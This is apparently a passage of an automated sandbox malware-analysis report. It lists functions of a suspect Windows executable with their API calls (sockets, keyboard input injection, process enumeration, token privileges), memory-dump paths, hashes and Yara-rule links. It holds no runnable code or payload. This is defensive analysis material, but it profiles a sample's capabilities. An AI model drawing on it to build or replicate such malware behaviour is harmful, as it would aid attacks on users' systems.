Opcode ID: d24e73031e9764f5525cbe34dc4c69b6e5b14a589757a2d2d33e952120f1b2ca
Instruction ID: 86df9e3eba784715b073d89e87edf6d82ee72bbce5c68e0892ad8f8f612e21f9
Opcode Fuzzy Hash: d24e73031e9764f5525cbe34dc4c69b6e5b14a589757a2d2d33e952120f1b2ca
Instruction Fuzzy Hash: 19C13475A0020AEFCB04CFA8C898FAEB7B5FF48314F24859CE505AB251D735AE41CB90

Function 007E342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007E3459
CoUninitialize.OLE32 ref: 007E3463
VariantInit.OLEAUT32(?), ref: 007E346E
VariantClear.OLEAUT32(?), ref: 007E371B

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 066bf8c9dd9874b8c1bc17b2451e04553d836abe6607c7a6386926f0768be1dd
Instruction ID: 8d2df8ab9e3d906fc8e597fba402bc2aecdda927517ece9cd82a3c5c0c259eb5
Opcode Fuzzy Hash: 066bf8c9dd9874b8c1bc17b2451e04553d836abe6607c7a6386926f0768be1dd
Instruction Fuzzy Hash: 8AA15875204240DFCB05DF29C589A2AB7E5FF8C754F048859F98A9B362DB38EE11CB91

Function 007C0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007FFC08,?), ref: 007C05F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007FFC08,?), ref: 007C0608
CLSIDFromProgID.OLE32(?,?,00000000,007FCC40,000000FF,?,00000000,00000800,00000000,?,007FFC08,?), ref: 007C062D
_memcmp.LIBVCRUNTIME ref: 007C064E

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: d471be2dcc16f50db1d64300beca51b45e4edc514483b69913a1a70616aed231
Instruction ID: 3f7c3eb592e6e8e58d23b722f20a70def46ae2f17c173c6bbd236d408a0685d7
Opcode Fuzzy Hash: d471be2dcc16f50db1d64300beca51b45e4edc514483b69913a1a70616aed231
Instruction Fuzzy Hash: 6E81E975A00109EFCB04DF94C988EEEB7B9FF89315F20455CE516AB250DB75AE06CBA0

Function 007A1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 007A14C0

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4fd9437515aca84388481e3380595feab3c53566820e6a6f3b86da31eaf991f8
Instruction ID: f99936c13d1a86274c9957233c40c539adcf4d93ea3caea7eebe4d72edd3b679
Opcode Fuzzy Hash: 4fd9437515aca84388481e3380595feab3c53566820e6a6f3b86da31eaf991f8
Instruction Fuzzy Hash: DA410A31940154EBFF217BBD9C49AAE3AA4FF8B370F544325F419D6192E63C484197A1

Function 007E1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 007E1AFD
WSAGetLastError.WSOCK32 ref: 007E1B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007E1B8A
WSAGetLastError.WSOCK32 ref: 007E1B94

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 6da5708e7d5f224c1ac8a1498064221d57c010bedc5221132eab2bf9dd3d6e82
Instruction ID: 60791a13c574a48b33f13ac1e3e4c6042b54c4272898ba2515f07d6e89dc0b46
Opcode Fuzzy Hash: 6da5708e7d5f224c1ac8a1498064221d57c010bedc5221132eab2bf9dd3d6e82
Instruction Fuzzy Hash: A541C474600200AFD720AF24C88AF6577E5AB48718F94C448F91A9F7D3D77AED41CB90

Function 0079B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c386cae71e5da75af8a1b80c125f3f5d090a6931ddfd7dddd383c43243d6597a
Instruction ID: b43db658ee967e26b08b37d491b12421df3c4f739aef9f29d14a248ffffc43d7
Opcode Fuzzy Hash: c386cae71e5da75af8a1b80c125f3f5d090a6931ddfd7dddd383c43243d6597a
Instruction Fuzzy Hash: 24413C75A00744FFDB24AF78ED45B6E7BE9EB88710F10452EF141DB292D37999018780

Function 007D56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007D5783
GetLastError.KERNEL32(?,00000000), ref: 007D57A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007D57CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007D57FA

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 954d2acd2f3904bdd0301f589835c4646812476a185fcf450542bd83bc4d4e66
Instruction ID: f634a72cb7c00462f074f83aaa9d0261b90bccdf8f2d41d170b5421263646c10
Opcode Fuzzy Hash: 954d2acd2f3904bdd0301f589835c4646812476a185fcf450542bd83bc4d4e66
Instruction Fuzzy Hash: AD410A35600610DFCB15DF55C548A5ABBF2EF89324B198489EC4AAB362CB38FD50DB91

Function 0079D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00786D71,00000000,00000000,007882D9,?,007882D9,?,00000001,00786D71,?,00000001,007882D9,007882D9), ref: 0079D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0079D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0079D9AB
__freea.LIBCMT ref: 0079D9B4

Part of subcall function 00793820: RtlAllocateHeap.NTDLL(00000000,?,00831444,?,0077FDF5,?,?,0076A976,00000010,00831440,007613FC,?,007613C6,?,00761129), ref: 00793852

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 6ee0136a6cf0a313332893ba47c2af27b152783057fef77be139ec04be4368e5
Instruction ID: 81b2b30a84f99983353cfcf73f96399711caf0a83d75ec1cb30058e4de8e8654
Opcode Fuzzy Hash: 6ee0136a6cf0a313332893ba47c2af27b152783057fef77be139ec04be4368e5
Instruction Fuzzy Hash: 3731B072A0020AABDF25EF65EC45EAE7BA5EB40320B054169FC04D7251EB39DD55CB90

Function 007CAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 007CABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 007CAC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 007CAC74
SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 007CACC6

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 201d5deb15265fc63a18df77c831c37f2fa8ca7a0689ae02dbbce20dd6b43ddb
Instruction ID: e514a4fb763fa7bc3219d7a809590a90d9fc6c24b9e04a92eceb4928894c1084
Opcode Fuzzy Hash: 201d5deb15265fc63a18df77c831c37f2fa8ca7a0689ae02dbbce20dd6b43ddb
Instruction Fuzzy Hash: 52312830A4421CBFFF35CB648C08FFA7BA5AB45319F04421EE481921D1C37C89958776

Function 007F7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 007F769A
GetWindowRect.USER32(?,?), ref: 007F7710
PtInRect.USER32(?,?,007F8B89), ref: 007F7720
MessageBeep.USER32(00000000), ref: 007F778C

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: f432df253282e2661cafe8ddbcef912da0a642e2d525cdc74b263bd7ad5afedc
Instruction ID: 9e56005a7c3a543828d8e97a35b3d3ab7695a37de58ea102241dee7914a1b63c
Opcode Fuzzy Hash: f432df253282e2661cafe8ddbcef912da0a642e2d525cdc74b263bd7ad5afedc
Instruction Fuzzy Hash: 23419E34605218DFCB05EF58C898EB9BBF5BB48714F5584A8EA149B361C334E941CBA0

Function 007F16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 007F16EB

Part of subcall function 007C3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007C3A57
Part of subcall function 007C3A3D: GetCurrentThreadId.KERNEL32 ref: 007C3A5E
Part of subcall function 007C3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007C25B3), ref: 007C3A65

GetCaretPos.USER32(?), ref: 007F16FF
ClientToScreen.USER32(00000000,?), ref: 007F174C
GetForegroundWindow.USER32 ref: 007F1752

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 29884e8be914364b586c336c09e545ed969febc60e51fc91971db925b63d137e
Instruction ID: 91303a986f4ec1fe4a61d1e35d42ddd717746ea131c11060fee5dd708894580a
Opcode Fuzzy Hash: 29884e8be914364b586c336c09e545ed969febc60e51fc91971db925b63d137e
Instruction Fuzzy Hash: 6B315075D00149EFC704EFA9C985DBEBBF9EF48304B5480AAE416E7211D6399E45CBA0

Function 007CD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 007CD501
Process32FirstW.KERNEL32(00000000,?), ref: 007CD50F
Process32NextW.KERNEL32(00000000,?), ref: 007CD52F
CloseHandle.KERNEL32(00000000), ref: 007CD5DC

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 58d6857d8891f21602a2814d12d4e73853a7cdb255969d327ae3246477a75744
Instruction ID: 914fcd0fd11476ac48a8c57fdc3c203a207c5bd6db0b0e3fae635ebc3f181f74
Opcode Fuzzy Hash: 58d6857d8891f21602a2814d12d4e73853a7cdb255969d327ae3246477a75744
Instruction Fuzzy Hash: 1431AF71008304DFD311EF54D885EAFBBE8EF99344F10092DF982931A1EB759948CBA2

Function 007F8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00779BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00779BB2

GetCursorPos.USER32(?), ref: 007F9001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007B7711,?,?,?,?,?), ref: 007F9016
GetCursorPos.USER32(?), ref: 007F905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007B7711,?,?,?), ref: 007F9094

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 68b406dbdeaf3848b668992651b6a5f1711b7eed5ac06df9deb083e056df3be8
Instruction ID: aa41d5bc0321b4c1a65982e2230430c4f33b21c08ce82c632d43b43b89a40edc
Opcode Fuzzy Hash: 68b406dbdeaf3848b668992651b6a5f1711b7eed5ac06df9deb083e056df3be8
Instruction Fuzzy Hash: 8D215C3560001CEFDB168F94C858FFABBB9FB89750F144065FA058B2A1C7399990DB64

Function 007CD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,007FCB68), ref: 007CD2FB
GetLastError.KERNEL32 ref: 007CD30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 007CD319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007FCB68), ref: 007CD376

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 67b260124dfacc17f73c98743e676e8b3fe9ddfd35a853e6df781d053a4b5d08
Instruction ID: 2dced08c8d790c2c45ebd8a8a8b1cd4f02fe304db41cd6163c6061c782934e55
Opcode Fuzzy Hash: 67b260124dfacc17f73c98743e676e8b3fe9ddfd35a853e6df781d053a4b5d08
Instruction Fuzzy Hash: 1B21A370504205DF8320DF24C98596AB7E8FE55364F104A2EF899C72A1D738DD45CB93

Function 007C1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C102A
Part of subcall function 007C1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C1036
Part of subcall function 007C1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C1045
Part of subcall function 007C1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C104C
Part of subcall function 007C1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C1062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007C15BE
_memcmp.LIBVCRUNTIME ref: 007C15E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C1617
HeapFree.KERNEL32(00000000), ref: 007C161E

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 5cb6043b74eb94be93fc0bf541094e53d4998ba854c3c1f767d9cf07e98475fb
Instruction ID: a99738b1b174a788b8d1d360487873daf946ad21e8eb3ce536b148bae70a8960
Opcode Fuzzy Hash: 5cb6043b74eb94be93fc0bf541094e53d4998ba854c3c1f767d9cf07e98475fb
Instruction Fuzzy Hash: 89217C71E00108EFDB00DFA4C945FEEB7B8EF45344F59846DE441A7242EB38AA05DB50

Function 007F2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 007F280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 007F2824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 007F2832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007F2840

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 76d5e47df9f2a16d14087d872317dd02d00d789a89a4179c904463acb584c08c
Instruction ID: 478b31b0ce7e208b9deb914c2f4da4aef9c711592055252bc8126a3777128bdd
Opcode Fuzzy Hash: 76d5e47df9f2a16d14087d872317dd02d00d789a89a4179c904463acb584c08c
Instruction Fuzzy Hash: 0321C131209519AFD7159B24C844FBA7B95AF45324F248158FA26CB7E3CB79FC82C790

Function 007C78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 007C8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,007C790A,?,000000FF,?,007C8754,00000000,?,0000001C,?,?), ref: 007C8D8C
Part of subcall function 007C8D7D: lstrcpyW.KERNEL32(00000000,?,?,007C790A,?,000000FF,?,007C8754,00000000,?,0000001C,?,?,00000000), ref: 007C8DB2
Part of subcall function 007C8D7D: lstrcmpiW.KERNEL32(00000000,?,007C790A,?,000000FF,?,007C8754,00000000,?,0000001C,?,?), ref: 007C8DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,007C8754,00000000,?,0000001C,?,?,00000000), ref: 007C7923
lstrcpyW.KERNEL32(00000000,?,?,007C8754,00000000,?,0000001C,?,?,00000000), ref: 007C7949
lstrcmpiW.KERNEL32(00000002,cdecl,?,007C8754,00000000,?,0000001C,?,?,00000000), ref: 007C7984

Strings

cdecl, xrefs: 007C797B

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 30651cf47eccf81886a45020db49b5846e505b07e6f23c601e9dc5bec3c6a283
Instruction ID: 98f71fde6b11bc33a20bd3dc0fd9084911dd07e39935e6587620f6d7ebb54956
Opcode Fuzzy Hash: 30651cf47eccf81886a45020db49b5846e505b07e6f23c601e9dc5bec3c6a283
Instruction Fuzzy Hash: 0311E93A200305ABCB155F38D845E7A77E9FF45390B50802EF946C7264EF799811CB61

Function 007F7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 007F7D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 007F7D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007F7D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007DB7AD,00000000), ref: 007F7D6B

Part of subcall function 00779BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00779BB2

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 404f7b278f189d2be86b687bcb411fa25ca0f78219d34d781e1d93237d28cda7
Instruction ID: 33bc3297f307135c2d36a9d0ba3004fc5e79d0cd7c3b78666ab7a37ef3a18557
